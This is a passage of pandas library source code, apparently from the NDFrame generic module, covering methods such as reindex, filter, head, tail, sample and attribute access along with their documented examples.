    1    2
    2    3
    3    4
    dtype: int64

    >>> s.add_suffix('_item')
    0_item    1
    1_item    2
    2_item    3
    3_item    4
    dtype: int64

    >>> df = pd.DataFrame({'A': [1, 2, 3, 4], 'B': [3, 4, 5, 6]})
    >>> df
       A  B
    0  1  3
    1  2  4
    2  3  5
    3  4  6

    >>> df.add_suffix('_col')
         A_col  B_col
    0       1       3
    1       2       4
    2       3       5
    3       4       6
    """
    # Bind ``suffix`` so each label is rendered as f"{label}{suffix}".
    f = functools.partial("{}{suffix}".format, suffix=suffix)

    # Rename along the info axis: rows for Series, columns for DataFrame.
    mapper = {self._info_axis_name: f}
    return self.rename(**mapper)  # type: ignore
def sort_values(
    self,
    axis=0,
    ascending=True,
    inplace: bool_t = False,
    kind: str = "quicksort",
    na_position: str = "last",
    ignore_index: bool_t = False,
):
    """
    Sort by the values along either axis.

    Parameters
    ----------%(optional_by)s
    axis : %(axes_single_arg)s, default 0
        Axis to be sorted.
    ascending : bool or list of bool, default True
        Sort ascending vs. descending. Specify list for multiple sort
        orders. If this is a list of bools, must match the length of
        the by.
    inplace : bool, default False
        If True, perform operation in-place.
    kind : {'quicksort', 'mergesort', 'heapsort'}, default 'quicksort'
        Choice of sorting algorithm. See also ndarray.np.sort for more
        information. `mergesort` is the only stable algorithm. For
        DataFrames, this option is only applied when sorting on a single
        column or label.
    na_position : {'first', 'last'}, default 'last'
        Puts NaNs at the beginning if `first`; `last` puts NaNs at the
        end.
    ignore_index : bool, default False
        If True, the resulting axis will be labeled 0, 1, …, n - 1.

        .. versionadded:: 1.0.0

    Returns
    -------
    sorted_obj : DataFrame or None
        DataFrame with sorted values if inplace=False, None otherwise.

    Examples
    --------
    >>> df = pd.DataFrame({
    ...     'col1': ['A', 'A', 'B', np.nan, 'D', 'C'],
    ...     'col2': [2, 1, 9, 8, 7, 4],
    ...     'col3': [0, 1, 9, 4, 2, 3],
    ... })
    >>> df
      col1  col2  col3
    0    A     2     0
    1    A     1     1
    2    B     9     9
    3  NaN     8     4
    4    D     7     2
    5    C     4     3

    Sort by col1

    >>> df.sort_values(by=['col1'])
      col1  col2  col3
    0    A     2     0
    1    A     1     1
    2    B     9     9
    5    C     4     3
    4    D     7     2
    3  NaN     8     4

    Sort by multiple columns

    >>> df.sort_values(by=['col1', 'col2'])
      col1  col2  col3
    1    A     1     1
    0    A     2     0
    2    B     9     9
    5    C     4     3
    4    D     7     2
    3  NaN     8     4

    Sort Descending

    >>> df.sort_values(by='col1', ascending=False)
      col1  col2  col3
    4    D     7     2
    5    C     4     3
    2    B     9     9
    0    A     2     0
    1    A     1     1
    3  NaN     8     4

    Putting NAs first

    >>> df.sort_values(by='col1', ascending=False, na_position='first')
      col1  col2  col3
    3  NaN     8     4
    4    D     7     2
    5    C     4     3
    2    B     9     9
    0    A     2     0
    1    A     1     1
    """
    # Abstract at this level; Series/DataFrame provide the implementation.
    raise AbstractMethodError(self)
def reindex(self: FrameOrSeries, *args, **kwargs) -> FrameOrSeries:
    """
    Conform %(klass)s to new index with optional filling logic.

    Places NA/NaN in locations having no value in the previous index. A new object
    is produced unless the new index is equivalent to the current one and
    ``copy=False``.

    Parameters
    ----------
    %(optional_labels)s
    %(axes)s : array-like, optional
        New labels / index to conform to, should be specified using
        keywords. Preferably an Index object to avoid duplicating data.
    %(optional_axis)s
    method : {None, 'backfill'/'bfill', 'pad'/'ffill', 'nearest'}
        Method to use for filling holes in reindexed DataFrame.
        Please note: this is only applicable to DataFrames/Series with a
        monotonically increasing/decreasing index.

        * None (default): don't fill gaps
        * pad / ffill: Propagate last valid observation forward to next
          valid.
        * backfill / bfill: Use next valid observation to fill gap.
        * nearest: Use nearest valid observations to fill gap.
    copy : bool, default True
        Return a new object, even if the passed indexes are the same.
    level : int or name
        Broadcast across a level, matching Index values on the
        passed MultiIndex level.
    fill_value : scalar, default np.NaN
        Value to use for missing values. Defaults to NaN, but can be any
        "compatible" value.
    limit : int, default None
        Maximum number of consecutive elements to forward or backward fill.
    tolerance : optional
        Maximum distance between original and new labels for inexact
        matches. The values of the index at the matching locations most
        satisfy the equation ``abs(index[indexer] - target) <= tolerance``.

        Tolerance may be a scalar value, which applies the same tolerance
        to all values, or list-like, which applies variable tolerance per
        element. List-like includes list, tuple, array, Series, and must be
        the same size as the index and its dtype must exactly match the
        index's type.

        .. versionadded:: 0.21.0 (list-like tolerance)

    Returns
    -------
    %(klass)s with changed index.

    See Also
    --------
    DataFrame.set_index : Set row labels.
    DataFrame.reset_index : Remove row labels or move them to new columns.
    DataFrame.reindex_like : Change to same indices as other DataFrame.

    Examples
    --------
    ``DataFrame.reindex`` supports two calling conventions

    * ``(index=index_labels, columns=column_labels, ...)``
    * ``(labels, axis={'index', 'columns'}, ...)``

    We *highly* recommend using keyword arguments to clarify your
    intent.

    Create a dataframe with some fictional data.

    >>> index = ['Firefox', 'Chrome', 'Safari', 'IE10', 'Konqueror']
    >>> df = pd.DataFrame({'http_status': [200, 200, 404, 404, 301],
    ...                    'response_time': [0.04, 0.02, 0.07, 0.08, 1.0]},
    ...                   index=index)
    >>> df
               http_status  response_time
    Firefox            200           0.04
    Chrome             200           0.02
    Safari             404           0.07
    IE10               404           0.08
    Konqueror          301           1.00

    Create a new index and reindex the dataframe. By default
    values in the new index that do not have corresponding
    records in the dataframe are assigned ``NaN``.

    >>> new_index = ['Safari', 'Iceweasel', 'Comodo Dragon', 'IE10',
    ...              'Chrome']
    >>> df.reindex(new_index)
                   http_status  response_time
    Safari               404.0           0.07
    Iceweasel              NaN            NaN
    Comodo Dragon          NaN            NaN
    IE10                 404.0           0.08
    Chrome               200.0           0.02

    We can fill in the missing values by passing a value to
    the keyword ``fill_value``. Because the index is not monotonically
    increasing or decreasing, we cannot use arguments to the keyword
    ``method`` to fill the ``NaN`` values.

    >>> df.reindex(new_index, fill_value=0)
                   http_status  response_time
    Safari                 404           0.07
    Iceweasel                0           0.00
    Comodo Dragon            0           0.00
    IE10                   404           0.08
    Chrome                 200           0.02

    >>> df.reindex(new_index, fill_value='missing')
                  http_status response_time
    Safari                404          0.07
    Iceweasel         missing       missing
    Comodo Dragon     missing       missing
    IE10                  404          0.08
    Chrome                200          0.02

    We can also reindex the columns.

    >>> df.reindex(columns=['http_status', 'user_agent'])
               http_status  user_agent
    Firefox            200         NaN
    Chrome             200         NaN
    Safari             404         NaN
    IE10               404         NaN
    Konqueror          301         NaN

    Or we can use "axis-style" keyword arguments

    >>> df.reindex(['http_status', 'user_agent'], axis="columns")
               http_status  user_agent
    Firefox            200         NaN
    Chrome             200         NaN
    Safari             404         NaN
    IE10               404         NaN
    Konqueror          301         NaN

    To further illustrate the filling functionality in
    ``reindex``, we will create a dataframe with a
    monotonically increasing index (for example, a sequence
    of dates).

    >>> date_index = pd.date_range('1/1/2010', periods=6, freq='D')
    >>> df2 = pd.DataFrame({"prices": [100, 101, np.nan, 100, 89, 88]},
    ...                    index=date_index)
    >>> df2
                prices
    2010-01-01   100.0
    2010-01-02   101.0
    2010-01-03     NaN
    2010-01-04   100.0
    2010-01-05    89.0
    2010-01-06    88.0

    Suppose we decide to expand the dataframe to cover a wider
    date range.

    >>> date_index2 = pd.date_range('12/29/2009', periods=10, freq='D')
    >>> df2.reindex(date_index2)
                prices
    2009-12-29     NaN
    2009-12-30     NaN
    2009-12-31     NaN
    2010-01-01   100.0
    2010-01-02   101.0
    2010-01-03     NaN
    2010-01-04   100.0
    2010-01-05    89.0
    2010-01-06    88.0
    2010-01-07     NaN

    The index entries that did not have a value in the original data frame
    (for example, '2009-12-29') are by default filled with ``NaN``.
    If desired, we can fill in the missing values using one of several
    options.

    For example, to back-propagate the last valid value to fill the ``NaN``
    values, pass ``bfill`` as an argument to the ``method`` keyword.

    >>> df2.reindex(date_index2, method='bfill')
                prices
    2009-12-29   100.0
    2009-12-30   100.0
    2009-12-31   100.0
    2010-01-01   100.0
    2010-01-02   101.0
    2010-01-03     NaN
    2010-01-04   100.0
    2010-01-05    89.0
    2010-01-06    88.0
    2010-01-07     NaN

    Please note that the ``NaN`` value present in the original dataframe
    (at index value 2010-01-03) will not be filled by any of the
    value propagation schemes. This is because filling while reindexing
    does not look at dataframe values, but only compares the original and
    desired indexes. If you do want to fill in the ``NaN`` values present
    in the original dataframe, use the ``fillna()`` method.

    See the :ref:`user guide <basics.reindexing>` for more.
    """
    # TODO: Decide if we care about having different examples for different
    # kinds

    # construct the args
    axes, kwargs = self._construct_axes_from_arguments(args, kwargs)
    method = missing.clean_reindex_fill_method(kwargs.pop("method", None))
    level = kwargs.pop("level", None)
    copy = kwargs.pop("copy", True)
    limit = kwargs.pop("limit", None)
    tolerance = kwargs.pop("tolerance", None)
    fill_value = kwargs.pop("fill_value", None)

    # Series.reindex doesn't use / need the axis kwarg
    # We pop and ignore it here, to make writing Series/Frame generic code
    # easier
    kwargs.pop("axis", None)

    # Anything still left in kwargs is unrecognized.
    if kwargs:
        raise TypeError(
            "reindex() got an unexpected keyword "
            f'argument "{list(kwargs.keys())[0]}"'
        )

    self._consolidate_inplace()

    # if all axes that are requested to reindex are equal, then only copy
    # if indicated must have index names equal here as well as values
    if all(
        self._get_axis(axis).identical(ax)
        for axis, ax in axes.items()
        if ax is not None
    ):
        if copy:
            return self.copy()
        return self

    # check if we are a multi reindex
    if self._needs_reindex_multi(axes, method, level):
        return self._reindex_multi(axes, copy, fill_value)

    # perform the reindex on the axes
    return self._reindex_axes(
        axes, level, limit, tolerance, method, fill_value, copy
    ).__finalize__(self)
def _reindex_axes(
    self: FrameOrSeries, axes, level, limit, tolerance, method, fill_value, copy
) -> FrameOrSeries:
    """Perform the reindex for all the axes."""
    result = self
    for axis_name in self._AXIS_ORDERS:
        target_labels = axes[axis_name]
        if target_labels is None:
            # This axis was not requested; leave it untouched.
            continue

        current_axis = self._get_axis(axis_name)
        new_index, indexer = current_axis.reindex(
            target_labels,
            level=level,
            limit=limit,
            tolerance=tolerance,
            method=method,
        )

        axis_number = self._get_axis_number(axis_name)
        result = result._reindex_with_indexers(
            {axis_number: [new_index, indexer]},
            fill_value=fill_value,
            copy=copy,
            allow_dups=False,
        )

    return result
def _needs_reindex_multi(self, axes, method, level) -> bool_t:
    """Check if we do need a multi reindex."""
    # Fast multi-axis reindex applies only when every axis is supplied
    # and no fill method, level, or mixed dtype is involved.
    all_axes_given = com.count_not_none(*axes.values()) == self._AXIS_LEN
    return (
        all_axes_given
        and method is None
        and level is None
        and not self._is_mixed_type
    )
def _reindex_multi(self, axes, copy, fill_value):
    """Reindex all axes at once; implemented by subclasses."""
    raise AbstractMethodError(self)
def _reindex_with_indexers(
    self: FrameOrSeries,
    reindexers,
    fill_value=None,
    copy: bool_t = False,
    allow_dups: bool_t = False,
) -> FrameOrSeries:
    """allow_dups indicates an internal call here """
    # reindex doing multiple operations on different axes if indicated
    new_data = self._data
    for axis in sorted(reindexers.keys()):
        index, indexer = reindexers[axis]
        baxis = self._get_block_manager_axis(axis)

        if index is None:
            continue

        index = ensure_index(index)
        if indexer is not None:
            indexer = ensure_int64(indexer)

        # TODO: speed up on homogeneous DataFrame objects
        new_data = new_data.reindex_indexer(
            index,
            indexer,
            axis=baxis,
            fill_value=fill_value,
            allow_dups=allow_dups,
            copy=copy,
        )

    if copy and new_data is self._data:
        # Nothing was actually reindexed; honor the copy request anyway.
        new_data = new_data.copy()

    return self._constructor(new_data).__finalize__(self)
def filter(
    self: FrameOrSeries,
    items=None,
    like: Optional[str] = None,
    regex: Optional[str] = None,
    axis=None,
) -> FrameOrSeries:
    """
    Subset the dataframe rows or columns according to the specified index labels.

    Note that this routine does not filter a dataframe on its
    contents. The filter is applied to the labels of the index.

    Parameters
    ----------
    items : list-like
        Keep labels from axis which are in items.
    like : str
        Keep labels from axis for which "like in label == True".
    regex : str (regular expression)
        Keep labels from axis for which re.search(regex, label) == True.
    axis : {0 or 'index', 1 or 'columns', None}, default None
        The axis to filter on, expressed either as an index (int)
        or axis name (str). By default this is the info axis,
        'index' for Series, 'columns' for DataFrame.

    Returns
    -------
    same type as input object

    See Also
    --------
    DataFrame.loc : Access a group of rows and columns
        by label(s) or a boolean array.

    Notes
    -----
    The ``items``, ``like``, and ``regex`` parameters are
    enforced to be mutually exclusive.

    ``axis`` defaults to the info axis that is used when indexing
    with ``[]``.

    Examples
    --------
    >>> df = pd.DataFrame(np.array(([1, 2, 3], [4, 5, 6])),
    ...                   index=['mouse', 'rabbit'],
    ...                   columns=['one', 'two', 'three'])

    >>> # select columns by name
    >>> df.filter(items=['one', 'three'])
             one  three
    mouse     1      3
    rabbit    4      6

    >>> # select columns by regular expression
    >>> df.filter(regex='e$', axis=1)
             one  three
    mouse     1      3
    rabbit    4      6

    >>> # select rows containing 'bbi'
    >>> df.filter(like='bbi', axis=0)
             one  two  three
    rabbit    4    5      6
    """
    nkw = com.count_not_none(items, like, regex)
    if nkw > 1:
        raise TypeError(
            "Keyword arguments `items`, `like`, or `regex` "
            "are mutually exclusive"
        )

    if axis is None:
        axis = self._info_axis_name
    labels = self._get_axis(axis)

    if items is not None:
        name = self._get_axis_name(axis)
        # Preserve the order of ``items``, dropping labels not present.
        return self.reindex(**{name: [r for r in items if r in labels]})
    elif like:

        def f(x):
            return like in ensure_str(x)

        values = labels.map(f)
        return self.loc(axis=axis)[values]
    elif regex:

        def f(x):
            # ``matcher`` is bound below, before ``labels.map(f)`` runs.
            return matcher.search(ensure_str(x)) is not None

        matcher = re.compile(regex)
        values = labels.map(f)
        return self.loc(axis=axis)[values]
    else:
        raise TypeError("Must pass either `items`, `like`, or `regex`")
def head(self: FrameOrSeries, n: int = 5) -> FrameOrSeries:
    """
    Return the first `n` rows.

    This function returns the first `n` rows for the object based
    on position. It is useful for quickly testing if your object
    has the right type of data in it.

    For negative values of `n`, this function returns all rows except
    the last `n` rows, equivalent to ``df[:-n]``.

    Parameters
    ----------
    n : int, default 5
        Number of rows to select.

    Returns
    -------
    same type as caller
        The first `n` rows of the caller object.

    See Also
    --------
    DataFrame.tail: Returns the last `n` rows.

    Examples
    --------
    >>> df = pd.DataFrame({'animal': ['alligator', 'bee', 'falcon', 'lion',
    ...                    'monkey', 'parrot', 'shark', 'whale', 'zebra']})
    >>> df
          animal
    0  alligator
    1        bee
    2     falcon
    3       lion
    4     monkey
    5     parrot
    6      shark
    7      whale
    8      zebra

    Viewing the first 5 lines

    >>> df.head()
          animal
    0  alligator
    1        bee
    2     falcon
    3       lion
    4     monkey

    Viewing the first `n` lines (three in this case)

    >>> df.head(3)
          animal
    0  alligator
    1        bee
    2     falcon

    For negative values of `n`

    >>> df.head(-3)
          animal
    0  alligator
    1        bee
    2     falcon
    3       lion
    4     monkey
    5     parrot
    """
    # Positional slice handles negative ``n`` naturally: [:-n].
    return self.iloc[:n]
def tail(self: FrameOrSeries, n: int = 5) -> FrameOrSeries:
    """
    Return the last `n` rows.

    This function returns last `n` rows from the object based on
    position. It is useful for quickly verifying data, for example,
    after sorting or appending rows.

    For negative values of `n`, this function returns all rows except
    the first `n` rows, equivalent to ``df[n:]``.

    Parameters
    ----------
    n : int, default 5
        Number of rows to select.

    Returns
    -------
    type of caller
        The last `n` rows of the caller object.

    See Also
    --------
    DataFrame.head : The first `n` rows of the caller object.

    Examples
    --------
    >>> df = pd.DataFrame({'animal': ['alligator', 'bee', 'falcon', 'lion',
    ...                    'monkey', 'parrot', 'shark', 'whale', 'zebra']})
    >>> df
          animal
    0  alligator
    1        bee
    2     falcon
    3       lion
    4     monkey
    5     parrot
    6      shark
    7      whale
    8      zebra

    Viewing the last 5 lines

    >>> df.tail()
       animal
    4  monkey
    5  parrot
    6   shark
    7   whale
    8   zebra

    Viewing the last `n` lines (three in this case)

    >>> df.tail(3)
      animal
    6  shark
    7  whale
    8  zebra

    For negative values of `n`

    >>> df.tail(-3)
       animal
    3    lion
    4  monkey
    5  parrot
    6   shark
    7   whale
    8   zebra
    """
    # n == 0 must be special-cased: since -0 == 0, ``iloc[-0:]`` would
    # return the whole object instead of an empty one.
    if n == 0:
        return self.iloc[0:0]
    return self.iloc[-n:]
def sample(
    self: FrameOrSeries,
    n=None,
    frac=None,
    replace=False,
    weights=None,
    random_state=None,
    axis=None,
) -> FrameOrSeries:
    """
    Return a random sample of items from an axis of object.

    You can use `random_state` for reproducibility.

    Parameters
    ----------
    n : int, optional
        Number of items from axis to return. Cannot be used with `frac`.
        Default = 1 if `frac` = None.
    frac : float, optional
        Fraction of axis items to return. Cannot be used with `n`.
    replace : bool, default False
        Allow or disallow sampling of the same row more than once.
    weights : str or ndarray-like, optional
        Default 'None' results in equal probability weighting.
        If passed a Series, will align with target object on index. Index
        values in weights not found in sampled object will be ignored and
        index values in sampled object not in weights will be assigned
        weights of zero.
        If called on a DataFrame, will accept the name of a column
        when axis = 0.
        Unless weights are a Series, weights must be same length as axis
        being sampled.
        If weights do not sum to 1, they will be normalized to sum to 1.
        Missing values in the weights column will be treated as zero.
        Infinite values not allowed.
    random_state : int or numpy.random.RandomState, optional
        Seed for the random number generator (if int), or numpy RandomState
        object.
    axis : {0 or 'index', 1 or 'columns', None}, default None
        Axis to sample. Accepts axis number or name. Default is stat axis
        for given data type (0 for Series and DataFrames).

    Returns
    -------
    Series or DataFrame
        A new object of same type as caller containing `n` items randomly
        sampled from the caller object.

    See Also
    --------
    numpy.random.choice: Generates a random sample from a given 1-D numpy
        array.

    Notes
    -----
    If `frac` > 1, `replacement` should be set to `True`.

    Examples
    --------
    >>> df = pd.DataFrame({'num_legs': [2, 4, 8, 0],
    ...                    'num_wings': [2, 0, 0, 0],
    ...                    'num_specimen_seen': [10, 2, 1, 8]},
    ...                   index=['falcon', 'dog', 'spider', 'fish'])
    >>> df
            num_legs  num_wings  num_specimen_seen
    falcon         2          2                 10
    dog            4          0                  2
    spider         8          0                  1
    fish           0          0                  8

    Extract 3 random elements from the ``Series`` ``df['num_legs']``:
    Note that we use `random_state` to ensure the reproducibility of
    the examples.

    >>> df['num_legs'].sample(n=3, random_state=1)
    fish      0
    spider    8
    falcon    2
    Name: num_legs, dtype: int64

    A random 50% sample of the ``DataFrame`` with replacement:

    >>> df.sample(frac=0.5, replace=True, random_state=1)
          num_legs  num_wings  num_specimen_seen
    dog          4          0                  2
    fish         0          0                  8

    An upsample sample of the ``DataFrame`` with replacement:
    Note that `replace` parameter has to be `True` for `frac` parameter > 1.

    >>> df.sample(frac=2, replace=True, random_state=1)
            num_legs  num_wings  num_specimen_seen
    dog            4          0                  2
    fish           0          0                  8
    falcon         2          2                 10
    falcon         2          2                 10
    fish           0          0                  8
    dog            4          0                  2
    fish           0          0                  8
    dog            4          0                  2

    Using a DataFrame column as weights. Rows with larger value in the
    `num_specimen_seen` column are more likely to be sampled.

    >>> df.sample(n=2, weights='num_specimen_seen', random_state=1)
            num_legs  num_wings  num_specimen_seen
    falcon         2          2                 10
    fish           0          0                  8
    """
    if axis is None:
        axis = self._stat_axis_number

    axis = self._get_axis_number(axis)
    axis_length = self.shape[axis]

    # Process random_state argument
    rs = com.random_state(random_state)

    # Check weights for compliance
    if weights is not None:

        # If a series, align with frame
        if isinstance(weights, ABCSeries):
            weights = weights.reindex(self.axes[axis])

        # Strings acceptable if a dataframe and axis = 0
        if isinstance(weights, str):
            if isinstance(self, ABCDataFrame):
                if axis == 0:
                    try:
                        weights = self[weights]
                    except KeyError as err:
                        raise KeyError(
                            "String passed to weights not a valid column"
                        ) from err
                else:
                    raise ValueError(
                        "Strings can only be passed to "
                        "weights when sampling from rows on "
                        "a DataFrame"
                    )
            else:
                raise ValueError(
                    "Strings cannot be passed as weights "
                    "when sampling from a Series."
                )

        weights = pd.Series(weights, dtype="float64")

        if len(weights) != axis_length:
            raise ValueError(
                "Weights and axis to be sampled must be of same length"
            )

        if (weights == np.inf).any() or (weights == -np.inf).any():
            raise ValueError("weight vector may not include `inf` values")

        if (weights < 0).any():
            # BUG FIX: error message previously read "many not"; corrected
            # to "may not".
            raise ValueError("weight vector may not include negative values")

        # If has nan, set to zero.
        weights = weights.fillna(0)

        # Renormalize if don't sum to 1
        if weights.sum() != 1:
            if weights.sum() != 0:
                weights = weights / weights.sum()
            else:
                raise ValueError("Invalid weights: weights sum to zero")

        weights = weights.values

    # If no frac or n, default to n=1.
    if n is None and frac is None:
        n = 1
    elif frac is not None and frac > 1 and not replace:
        raise ValueError(
            "Replace has to be set to `True` when "
            "upsampling the population `frac` > 1."
        )
    elif n is not None and frac is None and n % 1 != 0:
        raise ValueError("Only integers accepted as `n` values")
    elif n is None and frac is not None:
        n = int(round(frac * axis_length))
    elif n is not None and frac is not None:
        raise ValueError("Please enter a value for `frac` OR `n`, not both")

    # Check for negative sizes
    if n < 0:
        raise ValueError(
            "A negative number of rows requested. Please provide positive value."
        )

    locs = rs.choice(axis_length, size=n, replace=replace, p=weights)
    return self.take(locs, axis=axis)
_shared_docs[
"pipe"
] = r"""
Apply func(self, \*args, \*\*kwargs).
Parameters
----------
func : function
Function to apply to the %(klass)s.
``args``, and ``kwargs`` are passed into ``func``.
Alternatively a ``(callable, data_keyword)`` tuple where
``data_keyword`` is a string indicating the keyword of
``callable`` that expects the %(klass)s.
args : iterable, optional
Positional arguments passed into ``func``.
kwargs : mapping, optional
A dictionary of keyword arguments passed into ``func``.
Returns
-------
object : the return type of ``func``.
See Also
--------
DataFrame.apply : Apply a function along input axis of DataFrame.
DataFrame.applymap : Apply a function elementwise on a whole DataFrame.
Series.map : Apply a mapping correspondence on a
:class:`~pandas.Series`.
Notes
-----
Use ``.pipe`` when chaining together functions that expect
Series, DataFrames or GroupBy objects. Instead of writing
>>> f(g(h(df), arg1=a), arg2=b, arg3=c)
You can write
>>> (df.pipe(h)
... .pipe(g, arg1=a)
... .pipe(f, arg2=b, arg3=c)
... )
If you have a function that takes the data as (say) the second
argument, pass a tuple indicating which keyword expects the
data. For example, suppose ``f`` takes its data as ``arg2``:
>>> (df.pipe(h)
... .pipe(g, arg1=a)
... .pipe((f, 'arg2'), arg1=a, arg3=c)
... )
"""
# pipe: apply ``func(self, *args, **kwargs)``, or a
# ``(callable, data_keyword)`` tuple naming the keyword that receives self.
# The docstring comes from _shared_docs["pipe"] via @Appender, so no
# docstring is defined inline here.
@Appender(_shared_docs["pipe"] % _shared_doc_kwargs)
def pipe(self, func, *args, **kwargs):
    # Delegate to the shared implementation in pandas.core.common.
    return com.pipe(self, func, *args, **kwargs)
_shared_docs["aggregate"] = dedent(
"""
Aggregate using one or more operations over the specified axis.
%(versionadded)s
Parameters
----------
func : function, str, list or dict
Function to use for aggregating the data. If a function, must either
work when passed a %(klass)s or when passed to %(klass)s.apply.
Accepted combinations are:
- function
- string function name
- list of functions and/or function names, e.g. ``[np.sum, 'mean']``
- dict of axis labels -> functions, function names or list of such.
%(axis)s
*args
Positional arguments to pass to `func`.
**kwargs
Keyword arguments to pass to `func`.
Returns
-------
scalar, Series or DataFrame
The return can be:
* scalar : when Series.agg is called with single function
* Series : when DataFrame.agg is called with a single function
* DataFrame : when DataFrame.agg is called with several functions
Return scalar, Series or DataFrame.
%(see_also)s
Notes
-----
`agg` is an alias for `aggregate`. Use the alias.
A passed user-defined-function will be passed a Series for evaluation.
%(examples)s"""
)
# Doc template shared by Series.transform / DataFrame.transform;
# %(klass)s and %(axis)s are substituted per subclass.
_shared_docs[
    "transform"
] = """
Call ``func`` on self producing a %(klass)s with transformed values.
Produced %(klass)s will have same axis length as self.
Parameters
----------
func : function, str, list or dict
    Function to use for transforming the data. If a function, must either
    work when passed a %(klass)s or when passed to %(klass)s.apply.
    Accepted combinations are:
    - function
    - string function name
    - list of functions and/or function names, e.g. ``[np.exp, 'sqrt']``
    - dict of axis labels -> functions, function names or list of such.
%(axis)s
*args
    Positional arguments to pass to `func`.
**kwargs
    Keyword arguments to pass to `func`.
Returns
-------
%(klass)s
    A %(klass)s that must have the same length as self.
Raises
------
ValueError : If the returned %(klass)s has a different length than self.
See Also
--------
%(klass)s.agg : Only perform aggregating type operations.
%(klass)s.apply : Invoke function on a %(klass)s.
Examples
--------
>>> df = pd.DataFrame({'A': range(3), 'B': range(1, 4)})
>>> df
   A  B
0  0  1
1  1  2
2  2  3
>>> df.transform(lambda x: x + 1)
   A  B
0  1  2
1  2  3
2  3  4
Even though the resulting %(klass)s must have the same length as the
input %(klass)s, it is possible to provide several input functions:
>>> s = pd.Series(range(3))
>>> s
0    0
1    1
2    2
dtype: int64
>>> s.transform([np.sqrt, np.exp])
       sqrt        exp
0  0.000000   1.000000
1  1.000000   2.718282
2  1.414214   7.389056
"""
# ----------------------------------------------------------------------
# Attribute access
def __finalize__(
    self: FrameOrSeries, other, method=None, **kwargs
) -> FrameOrSeries:
    """
    Propagate metadata from ``other`` to ``self``.

    Parameters
    ----------
    other : object
        Source of metadata; ignored unless it is an NDFrame, in which
        case its ``attrs`` entries and every field listed in
        ``_metadata`` are copied onto ``self``.
    method : str, optional
        Name of the operation that produced ``self``; possibly used to
        take different types of propagation actions based on this.

    Returns
    -------
    self : same object, with metadata propagated.
    """
    if isinstance(other, NDFrame):
        for key, val in other.attrs.items():
            self.attrs[key] = val
        # Subclasses may declare extra fields to propagate via _metadata.
        for attr in self._metadata:
            assert isinstance(attr, str)
            object.__setattr__(self, attr, getattr(other, attr, None))
    return self
def __getattr__(self, name: str):
    """
    Fall back to column access after regular attribute lookup fails.

    This allows simpler access to columns for interactive use
    (``obj.colname`` for a label held by the info axis).
    """
    # Note: obj.x will always call obj.__getattribute__('x') prior to
    # calling obj.__getattr__('x'), so ``name`` is not a regular attribute
    # when we get here.
    is_internal = (
        name in self._internal_names_set
        or name in self._metadata
        or name in self._accessors
    )
    if not is_internal and self._info_axis._can_hold_identifiers_and_holds_name(
        name
    ):
        return self[name]
    return object.__getattribute__(self, name)
def __setattr__(self, name: str, value) -> None:
    """
    After regular attribute access, try setting the name
    This allows simpler access to columns for interactive use.
    """
    # first try regular attribute access via __getattribute__, so that
    # e.g. ``obj.x`` and ``obj.x = 4`` will always reference/modify
    # the same attribute.
    try:
        object.__getattribute__(self, name)
        return object.__setattr__(self, name, value)
    except AttributeError:
        pass
    # if this fails, go on to more involved attribute setting
    # (note that this matches __getattr__, above).
    if name in self._internal_names_set:
        object.__setattr__(self, name, value)
    elif name in self._metadata:
        object.__setattr__(self, name, value)
    else:
        try:
            existing = getattr(self, name)
            if isinstance(existing, Index):
                # Index-valued attributes are set as real attributes,
                # never routed to column assignment.
                object.__setattr__(self, name, value)
            elif name in self._info_axis:
                # ``name`` matches an existing label on the info axis:
                # treat the assignment as item setting (df.col = values).
                self[name] = value
            else:
                object.__setattr__(self, name, value)
        except (AttributeError, TypeError):
            # Assigning a list-like to a brand-new attribute on a DataFrame
            # is usually a failed attempt to create a column; warn, but
            # still perform the attribute assignment below.
            if isinstance(self, ABCDataFrame) and (is_list_like(value)):
                warnings.warn(
                    "Pandas doesn't allow columns to be "
                    "created via a new attribute name - see "
                    "https://pandas.pydata.org/pandas-docs/"
                    "stable/indexing.html#attribute-access",
                    stacklevel=2,
                )
            object.__setattr__(self, name, value)
def _dir_additions(self):
    """
    Add string-like labels from the info axis to ``dir()`` output.

    If the info axis is a MultiIndex, only its first level's values are
    used; the scan is capped at the first 100 unique labels.
    """
    candidate_labels = self._info_axis.unique(level=0)[:100]
    extra = set()
    for label in candidate_labels:
        if isinstance(label, str) and label.isidentifier():
            extra.add(label)
    return super()._dir_additions().union(extra)
# ----------------------------------------------------------------------
# Consolidation of internals
def _protect_consolidate(self, f):
    """
    Run ``f`` and clear the item cache if the block count changed.

    Consolidation may rearrange ``self._data``'s blocks; any cached
    items would then be stale, so they are dropped.
    """
    n_blocks_before = len(self._data.blocks)
    result = f()
    n_blocks_after = len(self._data.blocks)
    if n_blocks_after != n_blocks_before:
        self._clear_item_cache()
    return result
def _consolidate_inplace(self) -> None:
    """Consolidate data in place; returns None."""

    def _do_consolidate():
        # Rebind _data to its consolidated form.
        self._data = self._data.consolidate()

    self._protect_consolidate(_do_consolidate)
def _consolidate(self, inplace: bool_t = False):
    """
    Compute NDFrame with "consolidated" internals (data of each dtype
    grouped together in a single ndarray).

    Parameters
    ----------
    inplace : bool, default False
        If False return new object, otherwise modify existing object
        and return None.

    Returns
    -------
    consolidated : same type as caller, or None when ``inplace=True``
    """
    inplace = validate_bool_kwarg(inplace, "inplace")
    if inplace:
        self._consolidate_inplace()
        return None
    consolidated = self._protect_consolidate(self._data.consolidate)
    return self._constructor(consolidated).__finalize__(self)
@property
def _is_mixed_type(self) -> bool_t:
    # Consolidate-protected read of the block manager's mixed-type flag.
    def check():
        return self._data.is_mixed_type

    return self._protect_consolidate(check)
@property
def _is_numeric_mixed_type(self) -> bool_t:
    # Consolidate-protected read of the block manager's
    # numeric-mixed-type flag.
    def check():
        return self._data.is_numeric_mixed_type

    return self._protect_consolidate(check)
def _check_inplace_setting(self, value) -> bool_t:
    """ check whether we allow in-place setting with this type of value """
    # Homogeneous or numeric-mixed data can always be set in place.
    if not self._is_mixed_type:
        return True
    if self._is_numeric_mixed_type:
        return True
    # Mixed non-numeric data only accepts an actual np.nan in place.
    if is_float(value) and np.isnan(value):
        return True
    raise TypeError(
        "Cannot do inplace boolean setting on "
        "mixed-types with a non np.nan value"
    )
def _get_numeric_data(self):
    # Subset holding only numeric-dtype data, wrapped back in the
    # caller's type with metadata propagated via __finalize__.
    return self._constructor(self._data.get_numeric_data()).__finalize__(self)
def _get_bool_data(self):
    # Subset holding only boolean-dtype data, wrapped back in the
    # caller's type with metadata propagated via __finalize__.
    return self._constructor(self._data.get_bool_data()).__finalize__(self)
# ----------------------------------------------------------------------
# Internal Interface Methods
@property
def values(self) -> np.ndarray:
    """
    Return a Numpy representation of the DataFrame.

